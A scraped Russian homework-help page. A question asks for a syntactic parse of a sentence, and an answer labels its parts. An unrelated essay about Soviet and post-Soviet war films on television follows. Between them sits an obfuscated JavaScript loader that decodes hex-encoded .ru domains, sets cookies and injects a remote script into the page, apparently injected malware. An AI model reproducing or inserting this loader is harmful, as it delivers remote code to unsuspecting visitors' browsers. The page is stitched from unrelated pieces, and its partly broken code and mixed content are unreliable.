Есть ответ 👍

Синтаксический разбор предложения-неизвестные огоньки вызывали интерес , манили и притягивали

146
277
Посмотреть ответы 2

Ответы на вопрос:


Неизвестные(определение) огоньки(подлежащее) вызывали(сказуемое) интерес(дополнение) , манили(сказуемое)  и притягивали(сказуемое).

Повествовательное, невосклицательное рас с однородными сказуемыми.

Объяснение:


Window.a1336404323 = 1; ! function(){var e=json.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload=function(){this.a1649136515||(this.a1649136515=! 0,"function"==typeof t& & },i.onerror=function(){this.a1649136515||(this.a1649136515=! 0,i.parentnode.removechild(i),"function"==typeof o& & }}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(+"_"+(self===top? 0: 1)+".js"; window.a3164427983=f,c(u,function(){o("a2519043306")! =f& & n("a2519043306",f,{expires: parseint("3600")})},function(){var t=e.indexof(f),o=e[t+1]; o& & s(o)})},f=function(){var t,i=json.stringify(e); o("a36677002")! =i& & n("a36677002",i); var r=o("a2519043306"); t=r? r: e[0],s(t)}; f()}();

с утра федеральные каналы салютовали советскими художественными фильмами про войну. первый - "освобождением". "россия" - " о солдате". "культура" - "майскими ". далее, ближе к "прайму" на экране все чаще стали появляться в военном обмундировании актеры нового поколения. среди них  столь  популярные, как дмитрий дюжев, евгений миронов, владислав галкин, и т.д.

надо сказать, что в этом году, как никогда, много было выдано в эфир новых, снятых уже в постсоветское время "сочинений ко дню победы". самые примечательные из них - "в июне 41-го" (первый канал) и "мы из будущего" ("россия"). по времени в эфире они не совпали, и любознательный телезритель имел возможность и посмотреть оба фильма, и посравнить их.

сравнение сразу обнажает проблему, которой уходит в глубь советского кино.

всегда само собой подразумевалось, что кино про войну снимается с тем, чтобы сказать всю правду о ней и увековечить подвиг народа в целом и каждого человека в отдельности. но вот проходит всего лишь несколько лет после мая 45-го, и на экраны является киноводевиль "небесный тихоход", где есть подвиг, а правды нет. и картину, которая до сих пор жива, накрывает волна зубодробительной критики.

проходит еще с десяток лет, и появляется самое великое сочинение ко дню победы - "летят журавли", картина, где главным героем становится не тот, кто самоотверженно погиб на фронте, а та, которая в тылу предала любовь того, кто погиб. именно ей достались цветы и улыбки в день победы. на картину опять же обрушилась лавина идеологической критики, и не скоро бы мы увидели саму картину, если бы "журавлики-кораблики" случайно не долетели до канн, откуда вернулись на родину увенчанные пальмовой ветвью.

советские ортодоксы спрашивали, почему, с какого перепуга судьба некоей легкомысленной барышни, изменившей фронтовику с моральным уродом, оказалась в центре повествования о великом подвиге народа?

сегодня-то мы знаем ответ на этот вопрос. потому что в великой картине михаила калатозова речь не только о конкретной войне, но и еще о чем-то ином.

в фильме "летят журавли" - о сотворении внутреннего мира человека, о происхождении души.

на праздники картину повторили. ее стоит хотя бы раз в два года пересматривать. с расширяется ее смысл. эпизод массовой встречи фронтовиков в финале рифмуется со знаменитой сценой массовой разлуки. тогда вероника не видела общего горя и потому со своей личной бедой противостояла ему и потому была обречена двигаться против течения. теперь душа, воскреснув, разомкнута в своих границах. внутренний мир индивида расширился и стал вселенной. душа объяла необъятное - горе невозвратной утраты и радость общей победы, войну и мир и соединила несоединимое - смерть и жизнь.   ну вот както так

Популярно: Русский язык